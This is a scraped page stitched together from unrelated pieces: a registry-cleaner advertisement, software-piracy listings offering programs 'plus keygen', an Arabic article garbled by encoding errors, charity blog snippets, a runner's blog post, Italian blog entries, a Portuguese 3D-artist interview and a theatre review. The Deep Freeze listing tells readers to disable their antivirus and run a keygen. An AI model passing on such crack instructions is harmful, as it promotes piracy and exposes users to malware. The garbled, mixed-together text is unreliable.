Windows Doctor is the perfect solution to all kinds of registry problems. Its advanced scan engine is able to scan your entire registry within a few seconds to identify every single registry error and safely repair them for you. With Windows Doctor, youâll see immediate increases in performance and decreases in system conflicts. It will make your computer run as fluently as new and error-free. Windows Doctor applies the most professional and effective registry cleaner to solve your registry problem. Editing registry items is a highly risky task in that improperly modifying registry items may cause severe system damages. Windows Doctor knows the right way to deal with Windows registry. With a professionally designed scan engine, it carefully screens out the system-sensitive entries and accurately identifies and removes registry errors to boost Windows performance and eliminates Windows freezes and hangs. Windows Doctor guarantees 100% safety and effectiveness.
In addition to the registry cleaner, Windows Doctor provides many other useful tools to optimize your Windows so that you donât need to spend extra money on the expensive single-task software.
â¢ History Cleaner can clean all tracks of your activities to protect your privacy and improve PC performance;
â¢ Shortcuts cleaner identifies and removes the annoying redundant shortcuts that point to non-existent or invalid files.
â¢ Registry Defragger will defragment your registry to acquire linear registry structure, reduce application respond time and registry access time.
â¢ Start-up Manager allows you to easily inspect, delete or temporarily disable the start-up programs.
â¢ Uninstall Manager can safely remove the unwanted applications installed on your computer.
â¢ System Optimizer allows you to optimize your system settings, and as a result, boosts your system speed and improves system performance.
â¢ IE Manager can easily repair your IE problems as well as settings changed by malicious websites.
â¢ Additionally, Windows Doctor collects a list of very useful system tools to help you better manage your computer, such as Disk Cleanup, Disk Defragmenter, DirectX Diagnostic Tool, Registry Editor, etc.
Registry Cleaner â Fix PC Errors & Boost System Performance
â¢ Professionally designed scan engine will scan your entire registry within a few seconds.
â¢ A comprehensive error report after scan will list the found registry errors in 20 categories
â¢ User is allowed to easily sort the error report according to 10 different attributes
â¢ Powerful registry fixer will quickly fix all registry problems with one simple click
â¢ For advanced computer users, it provides more freedom by allowing user to select items to fix by himself.
Windows Doctor will fix all the registry errors that cause system instability, PC errors, crashes, system slowdown, including but not limited to:
â¢ Invalid User software settings
â¢ Invalid class keys
â¢ Invalid system software settings
â¢ Invalid fonts
â¢ Invalid browser helper objects
â¢ Invalid start-up programs
â¢ Invalid custom control settings
â¢ ActiveX errors
â¢ Errors in uninstall sections
â¢ Obsolete history lists
â¢ Shared DLL errors
â¢ Invalid file paths
â¢ Sound and AppEvents errors
â¢ Invalid file extensions
â¢ Startup popup window
â¢ Invalid software locations
â¢ Invalid System settings
â¢ Windows services error
â¢ Invalid help and resources
â¢ Invalid virtual devices
â¢ Empty registry keys
â¢ Invalid device drivers
System Optimizer allows you to optimize your system settings, and as a result, boosts your system speed and improves system performance. The System Optimizer will optimize the following settings to speed up your system:
â¢ Automatically end hung applications
â¢ Enable UDMA66 support
â¢ Optimize Internet connection
â¢ Force Windows to Unload DLLs from Memory
â¢ Speed up Windows refresh
â¢ Speed up browsing remote computers
â¢ Speed up loading internet explorer pages
â¢ Speed up the menu show delay
â¢ Boost up the Windows prefetcher service
OS: Windows 2000. XP, Vista, Windows 7, Windows 8 32-bit and 64-bit.
|Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen|
Lazesoft Data Recovery Unlimited Edition 3.4 + Keygen | 112 MB
Lazesoft Data Recovery offers home users and businesses complete solutions to recover deleted files or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure.
With easy to use interfaces and the most powerful data recovery software engine, you can using Lazesoft Data Recovery recover data by yourself, preview recovered files while the search is in progress.
Easy recovery in all major data loss cases.
Accidentally deleted files or emptied from recycle bin
Formatted media/disk drive/partitions/dynamic volumes
Logically crashed disk
Data deleted using Shift+Del keys
Files corrupted due to virus attacks
partition with corrupt file systems, etc.
Recover files even when your computer cannot boot up and cannot enter Windows.
Recover Data When Windows Cannot Boot up normally!
On some disk or Windows serious crashed, you might not be able to boot up your computer and enter Windows. Lazesoft Data Recovery can burn a bootable data recovery CD/USB and allow you to boot up your computer and rescue your data.
Boot from various brands of desktops, laptops like Dell, ThinkPad, Hp, Sony, Toshiba, Acer, Samsung, etc.
With WinPE-based and linux-base bootable disk builder, Lazesoft Recovery Suite has best hardware compatibility.
Boot up computer from CD or usb disk.
User friendly Boot Media Builder interface
|Deep Freeze Enterprise 7.70 + keygen|
Deep Freeze Enterprise 7.70 + keygen | 35.02 MB
The function of the program to those who heard him the first time: the program and his job are keeping the device as it is after you install the program
In other words, when you run this software, you can install programs as you like and delete what you want and change whatever you want, but after you restart the device will return the device as it was, and will delete what you added and retrieval what ..
So it is important for owners of cafes and computer teachers to protect their devices, as well as matter owners Alajhazh to the their children are using their devices
Deep Freeze instantly protects and preserves baseline computer configurations. No matter what changes a user makes to a workstation, simply restart to eradicate all changes and reset the computer to its original state - right down to the last byte. Expensive computer assets are kept running at 100% capacity and technical support time is reduced or eliminated completely. The result is consistent trouble-free computing on a truly protected and parallel network, completely free of harmful viruses and unwanted programs. While Deep Freeze provides bulletproof protection, its non-restrictive approach also improves user productivity and satisfaction. Placing no restrictions on a user's ability to access all system resources, users avoid the frustration of downtime due to software conflicts, operating system corruption, virus attacks, and many other problems. Users are always assured of computers that are consistently operable and available
Explain the work of Enable and Disable the program:
1 - press the Shift and DoubleClick the program Econh.
2 - Write responded basses if you've chosen before (if you do not press the Inter and salvation)
3 - to work Disable press Boot Thawed
4 - Enable press work Boot Frozen
5 - Restart the device.
NOTE Please Disable Your Anti Virus For 10-20 Minutes And Use The KeyGen For Activation.
1) Install the Application
2) Run Keygen follow instrunction.
|Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial|
Norton PartitionMagic 8.05 Build 1371 (Boot CD) + Serial | 276.14 MB
Norton PartitionMagic lets you easily organize your hard drive by creating, resizing, copying, and merging disk partitions. Separate your operating system, applications, documents, music, photos, games, and backup files to reduce the risk of data loss if your system crashes. You can use Norton PartitionMagic 8.0 to run multiple operating systems safely.
|Internet Download Manager IDM 6.17 Build 2 Final|
Internet Download Manager IDM 6.17 Build 2 Final | 5.09 MB
Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use.Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators Internet Download Manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance.
Internet Download Manager supports proxy servers, ftp and http protocols, firewalls, redirects, cookies, authorization, MP3 audio and MPEG video content processing. IDM integrates seamlessly into Microsoft Internet Explorer, Netscape, MSN Explorer, AOL, Opera, Mozilla, Mozilla Firefox, Mozilla Firebird, Avant Browser, MyIE2, and all other popular browsers to automatically handle your downloads. You can also drag and drop files, or use Internet Download Manager from command line. Internet Download Manager can dial your modem at the set time, download the files you want, then hang up or even shut down your computer when it's done.
Other features include multilingual support, zip preview, download categories, scheduler pro, sounds on different events, HTTPS support, queue processor, html help and tutorial, enhanced virus protection on download completion, progressive downloading with quotas (useful for connections that use some kind of fair access policy or FAP like Direcway, Direct PC, Hughes, etc.), built-in download accelerator, and many others.
Version 6.17 adds Windows 8.1 compatibility, adds IDM download panel for web-players that can be used to download flash videos from sites like YouTube, MySpaceTV, and Google Videos. It also features complete Windows 7 and Vista support, YouTube grabber, redeveloped scheduler, and MMS protocol support. The new version also adds improved integration for IE 10 and IE based browsers, redesigned and enhanced download engine, the unique advanced integration into all latest browsers, improved toolbar, and a wealth of other improvements and new features.
What's new in version 6.17 Build 2
(Released: July 12, 2013)
>Improved IE 11 integration (Windows 8.1)
>Added support for new youtube changes
|ØªØ³Ø±ÙØ¹ Ø§ÙÙÙØ§Ø´ Ù ÙÙ ÙØ±Ù " Ø§ÙÙÙØ§Ø´Ø© " Ø¹Ù Ø·Ø±ÙÙ ØªØºÙØ± ÙØ¸Ø§Ù Ø§ÙÙ ÙÙØ§Øª|
ØªØ¹Ø¯ Ù ÙØ¸Ù Ø§Øª Ø§ÙÙ ÙÙØ§Øª ÙÙ Ø§ Ø°ÙØ±ÙØ§ Ù Ù ÙØ¨Ù ÙÙ Ø§ÙØ¹ÙÙ Ø§ÙÙ Ø¯Ø¨Ø± ÙÙØ°Ø§ÙØ±Ø© " ÙÙ ÙÙÙ Ø§ÙØ±Ø¬ÙØ¹ ÙÙÙ ÙØ¶ÙØ¹ Ø¹Ù Ø·Ø±ÙÙ Ø§ÙØ¶ØºØ· ÙÙØ§ " ÙÙÙ Ø§ Ø°ÙØ±ÙØ§ Ø§ÙØ¶Ø§ ,, ÙØ¥Ù ØªØ¹Ø¯Ø¯ ØªÙÙ Ø§ÙÙ ÙØ¸Ù Ø§Øª Ø§Ù Ø§ÙØ§ÙØ¸Ù Ø© Ø±Ø§Ø¬Ø¹ Ø¥ÙÙ Ø§Ø®ØªÙØ§Ù ÙÙ Ø§ÙÙÙÙØ§Øª Ø°ÙÙ Ø§ÙÙØ¸Ø§Ù , ÙÙ ÙÙÙ Ù Ù ÙØ¹Ø·Ù Ø§ÙØ³Ø±Ø¹Ø© Ø§ÙØ§ÙÙ ÙØ© Ø§ÙØ§ÙØ¨Ø± Ø¹ÙÙ ØØ³Ø§Ø¨ Ø§ÙØªÙØ§ÙÙ Ù Ø¹ Ø§ÙØ¸Ù Ø© Ø§ÙØªØ´ØºÙÙ , ÙØ¨Ø§ÙØªØ§ÙÙ ÙØ¥ÙÙ ÙØ¨Ø§ÙØªØ£ÙÙØ¯ ØªÙØ¬Ø¯ Ø¨Ø¹Ø¶ Ø§ÙØ§ÙØ¸Ù Ø© Ø§ÙØªÙ ÙÙØ¶ÙÙØ§ Ø§ÙÙ Ø³ØªØ®Ø¯Ù ÙÙ Ø¹Ù ØºÙØ±ÙØ§ Ø¨Ø³Ø¨Ø¨ ØØ§Ø¬ØªÙÙ ÙØ³Ø±Ø¹Ø© ÙØ¨ÙØ±Ø© ÙÙÙÙ Ù ÙÙØ§ØªÙÙ Ù Ù ÙØ¥ÙÙ Ø§ÙØ°Ø§ÙØ±Ø© , ÙÙÙ Ù ÙØ¶ÙØ¹ Ø§ÙÙÙÙ Ø¥Ø´Ø§Ø±Ø© Ø¨Ø³ÙØ·Ø© Ø¥ÙÙ Ø§Ù ÙØ¸Ø§Ù NTFS ÙÙ Ø§Ø³Ø±Ø¹ ÙØ¸Ø§Ù ÙÙÙÙ Ø§ÙÙ ÙÙØ§Øª Ù Ù ÙØ¥ÙÙ Ø§ÙØ°Ø§ÙØ±Ø© ÙÙÙÙÙ ÙØ¹Ù Ù Ø¨Ø´ÙÙ ÙØ§Ù Ù Ù Ø¹ Ù Ø³ØªØ®Ø¯Ù ÙÙ Ø§ÙÙÙÙØ¯ÙØ² ÙÙØ· ! ÙÙÙÙ Ø§ÙÙØ±Ù ÙØ¨ÙØ± ÙÙ ÙØÙØ¸ Ø¹Ù Ø§Ø³ØªØ®Ø¯Ø§Ù ÙØ°Ø§ Ø§ÙÙØ¸Ø§Ù Ø¯ÙÙ ØºÙØ±Ù
ÙØ¥ÙÙÙÙ ØªÙÙ Ø§ÙÙ ÙØ§Ø±ÙØ© Ø§ÙØ³Ø±ÙØ¹Ø© Ø¨ÙÙ Ø¹Ù ÙÙØ© ÙÙÙ Ù ÙÙ Ø¥ÙÙ Ø°Ø§ÙØ±Ø© ØªØ³ØªØ®Ø¯Ù ÙØ¸Ø§Ù NTFS ÙÙØ¸Ø§Ù FAT32 :-
Ø¹ÙØ¯ Ø§Ø³ØªØ®Ø¯Ø§Ù ÙØ¸Ø§Ù Ø§Ù FAT32 :
ÙØ¹ÙØ¯ Ø§Ø³ØªØ®Ø¯Ø§Ù ÙØ¸Ø§Ù Ø§Ù NTFS ÙÙ ÙÙÙ ÙÙØ³ Ø§ÙÙ ÙÙ :
Ø¨Ø¹Ø¯ Ø°ÙÙ ÙØ®ØªØ§Ø± NTFS Ù Ù File Systems ÙÙØ¶ØºØ· Ø¹ÙÙ Start " Ù ÙØÙØ¸Ø© ÙØ§Ù Ø© Ø³ÙØªÙ Ù Ø³Ø ÙÙ Ø§ÙÙ ÙÙØ§Øª Ø§ÙÙ ÙØ¬ÙØ¯Ø© Ø¹ÙÙ Ø§ÙØ°Ø§ÙØ±Ø© "
ÙÙØ§ØØ¸ Ø§Ù Ø§ÙØ³Ø±Ø¹Ø© ØªØ¶Ø§Ø¹ÙØª ØªÙØ±ÙØ¨Ø§ ! ÙÙØ°Ø§ Ø§ÙÙØ±Ù ÙÙØ³ Ø¨Ø³ÙØ· Ø§Ø¨Ø¯Ø§ Ø¥Ø°Ø§ ÙÙØ§ ÙØ³ØªØ®Ø¯Ù ÙØ§Ø±Ø¯ Ø¯ÙØ³Ù Ø®Ø§Ø±Ø¬Ù ÙØªØµÙ Ø¹Ù Ø·Ø±ÙÙ Ø§Ù USB 3 Ù Ø«ÙØ§ ÙÙÙÙ 200 Ø¬ÙØ¬Ø§ Ù Ù Ø§ÙØ¨ÙØ§ÙØ§Øª ÙØ¶Ø¹Ù Ø§ÙØ³Ø±Ø¹Ø© ÙÙØ³ Ø§Ù Ø± ÙÙÙ ! ÙÙÙ Ù ÙØ§ ÙØ¹Ø±Ù Ø·Ø±ÙÙØ© ØªØºÙØ± ÙØ¸Ø§Ù Ø§ÙÙ ÙÙØ§Øª ÙØ§ÙØ·Ø±ÙÙØ© Ø¨Ø³ÙØ·Ø© Ø¬Ø¯Ø§ ÙÙØ³ØªØ¹Ø±Ø¶ÙØ§ ÙÙ Ø§ÙØ³Ø·ÙØ± Ø§ÙÙØ§Ø¯Ù Ø© .
Ø·Ø±ÙÙØ© ØªØºÙÙØ± ÙØ¸Ø§Ù
ÙÙÙØ°Ø§ Ø³ØªØªÙ ÙÙ Ù Ù Ø§ÙØØµÙÙ Ø¹ÙÙ Ø²ÙØ§Ø¯Ø© Ù Ø¤Ø«Ø±Ø© ÙÙ Ø³Ø±Ø¹Ø© ÙÙÙ Ø§ÙØ¨ÙØ§ÙØ§Øª Ù Ù ÙØ¥ÙÙ Ø§Ù Ø°Ø§ÙØ±Ø©
|Softchoice Cares in India: Follow their Journey||From Oct. 8-22, 2016, the Softchoice Cares board is volunteering in Rajasthan, India with Jatan Sansthan. The team will be working to update two computer labs that Softchoice Cares built last year, and train locals from the community, particularly kids, on how to use them â among many adventures. Check this blog post for regular […]|
|Kenya 2013: Perspectives from the Ground||Softchoice sends employees on international charitable missions for a number of reasons, among them are to develop leadership skills, experience the impact of giving first hand, and to help bridge the digital divide â providing computers and technology know-how to help children and adults develop new skills and break the cycle of poverty. Some wonder […]|
|Softchoice Cares: Does aid really make a difference? [Video]||The first week of February marks International Development Week (IDW) â a time to explore and celebrate the difference volunteers are making around the world. In honor of this yearâs event, Softchoice Cares – an employee-led philanthropic program focused on furthering computer literacy – has produced a video documentary of their 2012 trip to Bali. […]|
|Softchoice Cares + 7 IT Companies = A future for 500||When I heard about the Softchoice Cares mission to Bali I was intrigued. The thought of twelve employees going half way around the world to build computer labs for local kids is pretty inspiring and rare. But I was even more amazed by the number of partners who were going out of their way to […]|
|Join us for A Nightmare on Liberty St!||Who says trick orâ treating is just for kids? On October 28th, Softchoice dares you to go door to door in Liberty Village in support of Project Connect â a joint initiative with Habitat for Humanity to put computers in the homes of needy families across North America! For $20 youâll get to enjoy $1 […]|
|Metabolic Assessment||I wanted to share the results / process of the metabolic assessment that I had today. |
As I eluded to earlier, last February I began to enter races for this year. I had a long time off from running after neuroma surgery and it just really took a long time for me to be able to run again. 8 months or something dumb like that. Anyhow, that is a long time.
When I was able to finally run again, I wanted to run again withOUT pain, withOUT beating myself up. I am also so done with restriction and being hungry all of the time. For years. I just want to run, to feel great, to eat!
I began to research different training methods when I again came across Maffetone low heart rate training. I remembered that my Dad used Phil Maffetone methods as he trained for Grandma's Marathon in 2000. We ran together and it was so awesome! I then saw that my friend, Tracy Hoeg, was training clients using Phil's methods. In February I reached out to her and she was willing to take me on. At first, in order to keep my heart rate at 140 or under, I had to WALK. I'd run a few steps, and walk. It was disheartening, going so slowly, but it wasn't beating me up, either. Every 3-4 weeks Tracy had me run a 10 mile MAF test. At first my MAF miles were in the 12-13 minute mile area. I was discouraged. I had to walk some of each mile to keep my heart rate down. As time went one, I would see great improvement. Pretty soon I was taking off 1:30 each mile, no walk breaks and feeling really good. I couldn't believe that I could run 10 miles, on track, without any ankle pain, without any joint soreness. I had also at this time, added in fats, due to Tracy's and Phil's recommendation.
I'm excited to preform another 10 mile MAF test next Thursday.
So today I had an Active and Rest Metabolic Assessment at LifeTime Fitness, Chanhassen. A friend of mine, Heather, is a trainer there and preforms this test. I was so curious to see how my fat burning has increased. I knew that I was doing pretty well, because at Grandma's last Saturday I ran the whole race at 140 HR, had NO issues, it was hot, I did it on one bottle of UCAN. Incredible. I'm the one who needed one gel every 30 minutes.
I had to go into the test fasted. No breakfast, no coffee! I did fine without the breakfast but the coffee was tough! I stopped at Caribou on the way back from the test.
Heather hooked me up to a machine, attached a mask and the computer would read the data from my breathing. First was a rested assessment. I sat in a chair, closed my eyes and relaxed for 20 minutes. I learned that I now burn a lot of fat at rest. 96% of my burn is from fat while at rest.
We then went to the treadmill. After a warm up she had me run at 5.5 mph, 6, 6.5, 7, 7.5 to watch my fat/sugar burn and define my heart rate zones. I burn most of my fat at below 147 HR.
I learned that I should eat more calories. My body burns 2180 just breathing. I burn 2834 going through life, without my workout.
I learned that my VO2 score is 48.7
My heart rate zones/burnIt was very informative and I'm glad that I completed the testing. Heather was very thorough and gave me so much data. There is more information that I still have to wade through. Heather really impressed upon me that I need to eat more food. I have restricted for so many years that this is kind of scary to me but I have made progress. I know that science shows I need to eat more. I'll have another assessment in a few months. It will be fun to compare the data.
In other news, Steve and I are heading out for a drive vacation out west next month. We'll hit Glacier National Park to camp and hike for a few days and then south to Utah, where I've entered Capital Reef 50K. It begins at 7000feet elevation and much of the race is at 11000feet elevation. It ought to be a great trip, we are looking forward to it!
|Son tornato!||Ã da un bel po' che non mi faccio vivo.|
Non so perchÃ©, forse proprio non avevo nulla di interessante da raccontare, o meglio: se l'avevo era piÃ¹ interessante viverlo che raccontarlo!
Ci sono un mucchio di novitÃ , ma prima quelle piÃ¹ fresche:
vi scrivo dal mio computer, ma con una BELLISSIMA Ubuntu, che in quanto a grafica e comoditÃ Ã¨ ampiamente avanti a Windows XP (su Vista non mi pronuncio).
E da qualche minuto riesco pure a fare quella gran bella (inutilissima) cosa che fa tanta invidia ai Windowsiani: il cubo!
Per una dimostrazione venire a casa mia (e possibilmente prima che si rompa la magia...)
Oggi il clima semi-estivo ed il gran vento mi hanno proprio stordito: bello bello, ma a me Ã¨ parso piÃ¹ che altro un presagio di morte... caldo, a tratti afa... SUV ed auto che passano per le strade appestando l'aria, sole che pare dire: "questo giugno vi massacro tutti!".
Ah! ieri mi son fiondato al Lumiere a vedere Joe Strummer: Il futuro non Ã¨ scritto.
Titolo tradotto a parte, era da tempo che il cinema non riusciva ad emozionarmi tanto. Ed anche messo da parte il mio amore per il personaggio, Ã¨ proprio un documentario fatto bene.
Chi conosce i Clash non puÃ² non andarlo a vedere; chi non li conosce, o non ricorda bene chi sia questo Strummer, Ã¨ bene che non perda l'occasione: il film-documentario Ã¨ ben fatto, chiaro, trasmette le giuste emozioni.
Non Ã¨ esaustivo, non potrebbe neanche lontanamente, ma da un quadro interessante ed emozionante.
Ora ricordo perchÃ© non ho piÃ¹ scritto sul blog... depressione politica...
|Per finire la triennale||La seguente Ã¨ una manovra disperata: utilizzare lo sputtanamento pubblico per tentare di imporre una disciplina alla mia mente eternamente distratta.|
* da oggi fino al 16 dicembre studio per il seminario di Le Monde Diplomatique (bellissimo);
* dal 17 dicembre al 20 gennaio studio per l'esame di Storia moderna;
* durante le vacanze ed entro il 30 gennaio preparazione delle "prove" per l'esame di Informatica per le scienze storiche (caliamo un velo pietoso...);
* dal 7 febbraio al 15 aprile preparare l'esame di Storia delle dottrine politiche (paura)
avanti cosÃ¬ con gli esami in vista di una laurea per dicembre... ce la farÃ²?
Ho giÃ qualche idea per la testa... mi piacerebbe approfondire la storia dell'informatica e del computer e la questione del digital divide.
Il problema sarÃ trovare docenti che non si son fermati al motore a scoppio...
Altre idee ne ho, ma per ora sto fantasticando su questa, una alla volta!
Tag: esami, scadenze, tesi
|SCHWENKLER â O MAGO DO 3D||NÂº74 MOTO REPORT Fevereiro 2008|
NÂº47 MAGIK TUNNING PLUS MarÃ§o 2008
Na ediÃ§Ã£o anterior revelÃ¡mos o talento de um jovem portuguÃªs e a sua paixÃ£o pela criaÃ§Ã£o de motos atravÃ©s do mÃ©todo da realidade virtual. Nesta ediÃ§Ã£o terminamos o tema mostrando aquilo que serÃ¡ o expoente mÃ¡ximo, ao nÃvel mundial, e aquilo que um homem e um computador, juntos, sÃ£o capazes de fazer. Fomos ao encontro de quem faz das suas criaÃ§Ãµes 3D um modo de vida. Na AmÃ©rica, Russ Schwenkler (ou âDangerussâ, que Ã© como gosta de ser chamado no meio), fez uma pausa no seu trabalho para nos revelar alguns segredos da sua magia.
Â«Sempre tive um fascÃnio enorme por tudo o que estivesse relacionado com veÃculos. Em crianÃ§a coleccionava miniaturas e desenhava eu prÃ³prio veÃculos agressivos. Agora que tenho 46 anos, tenho de admitirâ¦ faÃ§o a mesma coisa. Ã engraÃ§ado ter conseguido combinar o meu trabalho artÃstico com o entusiasmo que tenho por mÃ¡quinas com motor. Profissionalmente os meus desenhos destinam-se a empresas de desenvolvimento na indÃºstria do car tuning, fabricantes de brinquedos, fabricantes de jogos para PC e consolas, e empresas de web design.Â»
MOTO REPORT: Ã motociclista?
DANGERUSS: Sou desde 1986. Tive uma data de motos desportivas. A Ãºltima foi uma Suzuki GSXR1000, com muita potÃªncia e muitas alteraÃ§Ãµes personalizadas. Infelizmente os ladrÃµes entraram na minha garagem e levaram-na. Limparam tudo desde os meus capacetes, fatos de cabedal, ferramentas, etc. Ainda nÃ£o a substituÃ, mas a nova Ducati 848 Ã© bastante tentadora. Fora as motos sou praticante regular de BTT.
MR: Quando se iniciou no 3D?
D: Foi em 1990. Tive de aprender modelaÃ§Ã£o 3D para o meu emprego de entÃ£o. Comecei com o 3D StudioÂ® para o MS-DOSÂ®. Na altura nÃ£o havia o GoogleÂ®, por isso eu nÃ£o podia pesquisar pelas centenas de recursos que existem hoje em dia, Ã distÃ¢ncia de um clique. Aprendi por tentativa e erro. Eu sou um admirador do estilo realista (pintura) e com o 3D conseguimos atingir um nÃvel de realismo muito bom e com menor esforÃ§o do que se utilizÃ¡ssemos as tÃ©cnicas de pintura. HÃ¡ partes da modulaÃ§Ã£o 3D que sÃ£o comuns, e por isso sÃ£o aproveitadas. As opÃ§Ãµes para acrescentar brilho, reflexos ou sombras, simplificam muito o trabalho. Ã claramente melhor para o artista.
MR: Por que precisam os seus clientes de imagens 3D dos produtos que eles prÃ³prios fabricam?
D: Eu tenho trabalhado com todos os vectores (principais, complementares e derivados) da indÃºstria automÃ³vel. Muitos clientes vÃªm ter comigo para que eu conceba algo que vai existir, mas ainda nÃ£o existe. Eles esperam, ou necessitam, ver um conceito ou uma imagem antes de ela ser transposta para o mundo real. Por exemplo, a capa e o material promocional de um jogo de corridas para a X-BOX 360Â® necessitava de um determinado carro. O carro nÃ£o existia na vida real, mas era importante que aparecesse e que mostrasse uma lista especÃfica de patrocÃnios, determinadas cores, e que estivesse inserido num ambiente grÃ¡fico altamente estilizado. O carro tinha de parecer altamente real, preferencialmente tinha de aparecer numa situaÃ§Ã£o de velocidade. Ora, usando tÃ©cnicas de modelaÃ§Ã£o 3D, foi-me possÃvel criar este ambiente de fantasia, nÃ£o sendo portanto necessÃ¡rio construir um carro real, pagar a um piloto e a um fotÃ³grafo, alugar o espaÃ§o e retocar o resultado final.
MR: Quanto custa desenhar uma moto?
D: A resposta a essa pergunta nÃ£o Ã© simples. Para um projecto 3D normal, facilmente despendo quarenta horas para moldar as formas, mais doze horas para acabamentos realÃsticos e materiais. Como cobro aos clientes por hora, quase sempre os trabalhos ultrapassam os 2.600 euros, mas tudo depende do nÃvel de detalhe. Ã como quando vamos comprar uma casa.
MR: Que software usa actualmente?
D: Desde o inÃcio da minha carreira que uso 3D StudioÂ® e o 3D Studio MAXÂ® da AutodeskÂ®. JÃ¡ devo ter actualizado as versÃµes mais de uma dÃºzia de vezes. Para mim, sÃ£o as que funcionam melhor pois, como ferramentas, sÃ£o muito poderosas e a capacidade de integrar situaÃ§Ãµes e contextos Ã© literalmente infinita. Para arte digital 2D uso, maioritariamente o Adobe Photoshop CS2Â® e recorro ao Adobe IllustratorÂ® para tarefas tecnicamente mais precisas como logÃ³tipos.
MR: E hardware? A renderizaÃ§Ã£o de imagens pode demorar horas infindÃ¡veisâ¦
D: Com efeito Ã© preciso alguma potÃªncia ao nÃvel da mÃ¡quina. Actualmente uso 2 processadores IntelÂ® Core DuoÂ® a 3.0GHZ com 4GB de RAM e uma placa grÃ¡fica aceleradora bastante dispendiosa. Trabalho em simultÃ¢neo com dois monitores Flat-Panel de 22 polegadas.
MR: Que parte do seu trabalho o entusiasma mais?
D: Eu gosto muito de dois aspectos do meu trabalho. Primeiro, Ã© a arte realÃstica. Entusiasma-me criar imagens que mais tarde podem passar a fotos. Adoro incluir o mÃ¡ximo de detalhes possÃvel. Segundo, e em oposiÃ§Ã£o, adoro desenhar motos e outros veÃculos fantÃ¡sticos e agressivos, com aerodinÃ¢micas exageradas e pormenores de competiÃ§Ã£o acima da mÃ©dia. Muitas vezes esses veÃculos tÃªm origens muito humildes. Ã engraÃ§ado pegar num Fiat e transformÃ¡-lo num carro de corridas de milhÃµes de dÃ³lares.
MR: JÃ¡ alguma vez criou uma moto para si ou alguÃ©m pegou numa das suas motos originais e a mandou construir?
D: Eu nÃ£o faÃ§o muitas criaÃ§Ãµes originais. A maior parte do meu trabalho assenta em desenhos jÃ¡ existentes, ou em modificaÃ§Ãµes dos mesmos. Portanto nÃ£o hÃ¡ nenhuma criaÃ§Ã£o original minha a rodar na estrada. Mas estou a trabalhar com um australiano que quer produzir um Super Car baseado num Corvette. Tenho-me dedicado Ã parte da carroÃ§aria. Se alguma vez ele conseguir realizar o projecto serÃ¡ espantoso!
MR: Qual a relevÃ¢ncia actualmente do 3D?
D: Nenhuma moto Ã© construÃda sem ferramentas 3D CAD (Computer Aided Design). A visualizaÃ§Ã£o 3D Ã© usada em muitos sectores para produzir imagens indistinguÃveis de fotografias. SÃ£o usadas em anÃºncios de TV, outdoors, filmes de cinema etc. Os construtores de motos conseguem mostrar imagens das suas mais recentes criaÃ§Ãµes antes mesmo de os protÃ³tipos estarem construÃdos. Com este recurso, os fabricantes conseguem determinar a dimensÃ£o ideal para os componentes das suas motos, como se interligam com outros componentes, quais as cores que jogam melhor, que tipos de jantes servem os melhores propÃ³sitos das motos, qual a suspensÃ£o mais adequada, e tudo isto sem a moto estar ainda construÃda. Depois de construÃda, em termos reais, e como disse, acaba por ser mais barato recorrer a imagens 3D do que expedir uma moto para um local exÃ³tico e preparar uma vasta equipa tÃ©cnica para fotografÃ¡-la.
MR: VÃª-se a si prÃ³prio mais como um artista ou como um especialista grÃ¡fico?
D: Creio que um pouco de cada. Para mim 3D e arte digital sÃ£o formas de arte perfeitamente legÃtimas. Como para criar imagens 3D Ã© necessÃ¡ria uma grande dose de tÃ©cnica, acontece que a actividade nÃ£o Ã© tanto encarada do ponto de vista artÃstico, mas mais como uma sequÃªncia de inputs precisos. Quem manipula 3D tens de criar, literalmente, ou tem de instruir a aplicaÃ§Ã£o para produzir absolutamente tudo. Todos os objectos de cena tÃªm de ser introduzidos, os materiais aplicados, luzes, reflexos, sombras, cenÃ¡rios, operaÃ§Ã£o de cÃ¢mara, texturas, Ã¢ngulos, efeito atmosfÃ©rico, etc. E para tudo isto nÃ£o hÃ¡ nos programas um botÃ£o que diga: âFazer Arteâ.
Â© Todos os direitos do texto estÃ£o reservados para MOTO REPORT, uma publicaÃ§Ã£o da JPJ EDITORA. Contacto para adquirir ediÃ§Ãµes jÃ¡ publicadas: +351 253 215 466.
Â© General Moto, by HÃ©lder Dias da Silva 2008
|BWW Review: BACK TO THE 80S at Theatre In The Park|
It's big hair, even bigger music numbers, and a little Star Wars as Theatre in the Park takes audiences BACK TO THE 80S.
The musical, written by Neil Gooding, takes place as a flashback with an older version of protagonist Corey Palmer (Langston Hemenway) narrating his senior year of high school and the trials and tribulations that is involved with being a teenager in the 80s, and is all centered around Billboard's top songs from the 80s.
Younger Corey (Alec Bridges) is running for senior class president with his friends (the hilarious Hewleek McKoy and Ryan Richeson) as his cohorts. He is running against the most popular guy in school, Michael Feldman (Alec Walberg), and the techno geek always ahead of his time, Feargal McFarrin (played by the witty Gerald Briscoe). Corey's whole platform is based on a benefit concert he wants the school to put on to raise money, but when Michael Feldman finds Corey's speech and goes first, stealing his ideas, Corey is left flabbergasted and can't bring himself to think of anything else to say in his speech.
Feargal is then laughed off the stage when he unveils his plan to make the school more technologically advanced with powerful computers, something no one believes will actually happen. Briscoe's rendition of "Video Killed the Radio Star" starts off as a joyful interpretation complete with a robot dance, but ultimately ends sad when the other students start to mock Feargal.
To no one's surprise, Michael Feldman wins the school elections. That's when, unbeknownst to both of them, Michael and Corey decide to put the moves on Tiffany (the delightful Korrie Murphy) with her favorite group's song (and my favorite number in the show) "I'm Gonna Be (500 Miles)" competing for her heart. Though both put in a valiant effort, Tiffany chooses the popular guy instead of our protagonist. In the pains of broken teenage love, Corey runs off the stage, and older Corey comes out to sing a heartfelt version of "You Give Love A Bad Name."
Corey is avenged when later in the second act it is revealed that Michael had been stuffing love letters in the new girl's locker with plans to ask her to prom, but stand her up. Tiffany finds out and Michael is no longer the ladies' man of the school. And what would a show that takes place in high school be without a big showstopper at prom? The whole cast dances together to perform a reprise of Wham's "Wake Me Up Before You Go-Go."
